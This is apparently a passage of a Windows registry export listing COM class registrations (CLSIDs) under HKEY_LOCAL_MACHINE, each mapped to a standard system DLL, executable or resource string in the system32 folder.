%systemroot%\system32\stclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\sud.dll,-10 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\sud.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-24 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.DefaultPrograms HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e44e9428-bdbc-4987-a099-40dc8fd255e7}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\OpenWith.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e46787a1-4629-4423-a693-be1f003b2742}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E476E4C0-409C-43CD-BBC0-5905B4138494} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E476E4C0-409C-43CD-BBC0-5905B4138494}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E4785230-0E43-47DC-826A-07DBC3AA63D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E49741E9-93A8-4AB1-8E96-BF4482282E9C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E49F7E50-C070-11DF-AC23-18A90531A85A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhengine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E4BCAC13-7F99-4908-9A8E-74E3BF24B6E1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E4C1D9A2-CBF7-48BD-9A69-34A55E0D8941}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E4D5B02C-82A9-4363-BD02-8BA595200BCF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E4E915A9-8344-4F88-9326-2ADC071D4FF6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E54CDFAF-2381-4cad-AB99-F38517127D5C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E54E4714-22AE-40c5-BB24-F839845C7C98}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E565CAF2-2B8D-4499-9148-7EBAD978D4EF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\embeddedlockdownwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E573236F-55B1-4EDA-81EA-9F65DB0290D3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e5899c7c-0fc7-499e-a262-174fd692dc9f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\capiprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E5A040E9-1097-4D24-B89E-3C730036D615} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SetNetworkLocationFlyout.dll,-18401 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E5B5B938-52A0-4B37-8659-24EB5165B9A0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wbem\netdacim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E5CA59F5-57C4-4DD8-9BD6-1DEEEDD27AF4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Inked.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6290C32-443A-4529-AEC3-320ADF0F9622}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E64164EB-1AE0-4C50-BAEF-A413C2B3A4BC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ms3dthumbnailprovider.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E69FD98D-7EBE-4C01-BFED-67B4E4616A49}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e74e57b0-6c6d-44d5-9cda-fb2df5ed7435}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certCredProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e755468c-02f5-4d96-8487-3be68ffe633a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e760e244-abb3-4c3c-b925-0781c8ceb46c}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\colbact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7772804-3287-418E-9072-CF2B47238981}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B0F685-6247-4E7D-823E-06DEE79A8AA9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\splwow64.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7DE514C-BBBC-41D4-8838-4BB0FE21229A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7E4BC40-E76A-11CE-A9BB-00AA004AE837}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7E6A098-87CE-420D-91AE-413312AC8FA6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WfHc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E7E79A30-4F2C-4FAB-8D00-394F2D6BBEBE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E838B72C-83C9-4a08-8DD1-144CB14616F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E8C40B98-FCF5-4047-86DA-11A11590CB98}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e8e4dbb7-bfa1-4a0c-a168-b0568d4654e2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e916b6b2-22bd-4afc-b337-d3d9fb27670e}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9218AE7-9E91-11D1-BF60-0080C7846BC0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassdo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9495B87-D950-4ab5-87A5-FF6D70BF3E90} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\wscui.cpl,-2001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9495B87-D950-4ab5-87A5-FF6D70BF3E90}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\wscui.cpl,-5000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9495B87-D950-4ab5-87A5-FF6D70BF3E90}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wscui.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E95186C7-7D80-4311-843D-0702CBC8B1E4} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\RemoveDeviceContextHandler.dll,-1001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E95186C7-7D80-4311-843D-0702CBC8B1E4}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\DeviceCenter.dll,-151 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E95186C7-7D80-4311-843D-0702CBC8B1E4}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\RemoveDeviceContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9571AB2-AD92-4ec6-8924-4E5AD33790F5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E96767E0-7EAA-45E1-8E7D-64414AFF281A} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50192 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E96767E0-7EAA-45E1-8E7D-64414AFF281A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e9711a2f-350f-4ec1-8ebd-21245a8b9376}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E974D26D-3D9B-4D47-88CC-3872F2DC3585}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\XpsServices.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E979DAD9-25E8-45D7-AB42-43FB7B9F38CC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e9970fa4-b6aa-11d9-b032-000d56c25c27}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sdohlp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9A4A80A-44FE-4DE4-8971-7150B10A5199}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msheif.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E9F4EBAB-D97B-463e-A2B1-C54EE3F9414D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetsrc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\UserAccountControlSettings.dll,-70 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UserAccountControlSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ea72d00e-4960-42fa-ba92-7792a7944c1d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ea8b451c-5a19-49cf-bc5e-98accca49ef3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EAB16C5D-EED1-4E95-868B-0FBA1B42C092}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiutils.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EAE826D3-ECB5-49ff-BC55-7B318E78C6DD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dot3dlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EAF9FB9A-5B58-412C-ABF2-CABF9D7F8DFD} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\EasPolicyManagerBrokerHost.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{eb124705-128b-40d4-8dd8-d93ed12589a4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EB36A2D2-BA9E-457F-8023-66EE08D4D955}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EB56EAE8-BA51-11d2-B121-00805FC73204}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\stclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EB6B4457-F013-4E5A-9B05-1D44E4D6FAEB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\listsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiutils.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EBB08C45-6C4A-4FDC-AE53-4EB8C4C7DB8E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ebe53edd-8816-43b2-9c4f-47c7e2e2fb3b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EBFE7BA0-628D-11D2-AE0F-006097B01411}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ec05b81f-ec57-47c9-a6ce-eebc9b35861b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EC0AE07D-6A4C-49a4-8A40-F130C525D7D9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audiokse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EC278F3A-BFE8-42d5-99C0-E25F5EF4A3D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EC9846B3-2762-4A6B-A214-6ACB603462D2} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\FirewallControlPanel.dll,-12122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECABB0C3-7F19-11D2-978E-0000F8757E2A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECABB0C6-7F19-11D2-978E-0000F8757E2A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECD4FC4D-521C-11D0-B792-00A0C90312E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECD4FC4E-521C-11D0-B792-00A0C90312E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECD4FC4F-521C-11D0-B792-00A0C90312E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECF03A32-103D-11d2-854D-006008059367} FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mydocs.dll,-905 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECF03A32-103D-11d2-854D-006008059367}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECF03A32-103D-11d2-854D-006008059367}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mydocs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ecf5bf46-e3b6-449a-b56b-43f58f867814}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\IDStore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ECF622A8-028B-4275-B9F6-1C84EE411A3E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED43BB3C-09E9-498a-9DF6-2177244C6DB4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED4B1828-CD88-460F-AEFF-3D63FC8BBF68}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\dnsclientpsprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ed50fc29-b964-48a9-afb3-15ebb9b97f36}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ed6ae9cf-ad35-46b7-ac30-3f8b9eb5349f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32538 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32537 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED822C8C-D6BE-4301-A631-0E1416BAD28F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\themecpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\themecpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\themecpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\themecpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED8C22CA-7722-464A-A522-7967ABF63C35}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED999FF5-223A-4052-8ECE-0B10C8DBAA39}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{eda4e1db-2e1f-450d-9e65-7ec502cc0a4f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{edb5f444-cb8d-445a-a523-ec5ab6ea33c7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EDB9987A-FFF5-4bd2-8B05-2865F3EC621D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.ui.immersive.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{edc3a8b5-2e25-466a-a1ad-21e2f19414ac}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EDEA4743-46D4-4C14-B358-64FD126052EC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EE14E412-4988-458C-B863-76E3C1BF71C2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ee20eeba-df64-4a4e-b7bb-2d1c6b2dfcc1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EE366069-1832-420F-B381-0479AD066F19}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EE5799D0-070A-49EE-8476-6A02E46E9FDD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EE8E4870-A889-4DC4-969F-F38F707F4AC2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{eea0c191-dda8-4656-8fc4-72bdedba8a78}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EED01FD5-42B6-4846-A81F-9C40D219197F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF011F79-4000-406D-87AF-BFFB3FC39D57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF114C90-CD1D-484E-96E5-09CFAF912A21}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ef1c0450-0b48-4384-94ae-d1cb35641f86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF30258D-9897-45CD-A760-FE5C195CB00E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF30FFEE-87D2-414C-985D-473CA38D707E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF3E932C-D40B-4F51-8CCF-3F98F1B29D5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF411752-3736-4CB4-9C8C-8EF4CCB58EFE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ef43ecfe-2ab9-4632-bf21-58909dd177f0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF544DC6-8DD8-4D8E-B867-BC728AC2B6D7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DuCsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF6EF542-EB19-4986-89D3-143960609251}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF79AB42-5404-4BCA-8BD5-727160DDFAE5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EF985E71-D5C7-42D4-BA4D-2D073E2E96F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EFA97F08-EE06-42EC-AAAF-F8CB106247A2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FileAppxStreamingDataSource.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EFB23A09-A867-4BE8-83A6-86969A7D0856}\InProcServer32 (Default) REG_EXPAND_SZ %Systemroot%\system32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EFB92EFB-9236-4bd7-B60D-51D1C7D1C87A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EFCA3D92-DFD8-4672-A603-7420894BAD98}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{efce38d3-8914-4674-a7df-ae1b3d654b8a}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MFCaptureEngine.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EFE6629C-81F7-4281-BD91-C9D604A95AF6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F004F2CA-AEBC-4B0D-BF58-E516D5BCC0AB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F00B4404-F8F1-11CE-A5B6-00AA00680C3F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\stdprov.dll 